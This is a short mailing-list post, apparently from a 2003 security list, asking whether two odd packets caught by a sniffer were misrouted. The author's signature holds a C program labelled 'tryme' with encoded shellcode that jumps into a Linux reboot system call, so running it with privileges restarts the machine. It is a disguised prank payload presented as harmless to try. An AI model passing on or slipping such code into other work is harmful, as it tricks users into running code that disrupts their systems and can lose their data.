Hello everyone,
today while gathering a data from sniffer to my project i have caught
some strange sequence that shouldn't arrive at host i was 'sittin on', here
comes the log:
[18:04:25]253.216.8.218.65535 > 161.186.96.18.10065 S (ttl 16,len 49320,id
3584,tos 94,ack:0)win 8192,chks: 52182
[18:04:29]255.113.8.218.65535 > 163.195.80.16.15213 F (ttl 16,len 49320,id
3584,tos 94,ack:1)win 8353,chks: 6860
Because my host is located in totally different IP Class i wondered, how
this could happen, such thing never happend before, is it possible that this
was a missroute?
the 161.186.96.18 belongs to:PEPCO - Potomac Electric Power Company, 1900
Pennsylvania Ave. NW, Room 206, Washington, and 163.195.80.16 - Cape
Provincial Administration, Wale Street, Cape Town 8000, (163.195.0.0/16).
Greetz.
___________________________________
/*http://ipe.ath.cx/ Paweł Stochliński*/
char tryme[] =
"\xeb\x16\x5e\x31\xc0\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19"
"\x12\x28\xba\x67\x45\x23\x01\xcd\x80\xe8\xe5\xff\xff\xff";
void main(){ int *ret; ret = (int *)&ret + 2; (*ret) = (int)tryme;}
----------------------------------------------------------------------------
Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
world's premier technical IT security event! 10 tracks, 15 training sessions,
1,800 delegates from 30 nations including all of the top experts, from CSO's to
"underground" security specialists. See for yourself what the buzz is about!
Early-bird registration ends July 3. This event will sell out. www.blackhat.com
----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Mon Jul 07 2003 - 12:28:56 PDT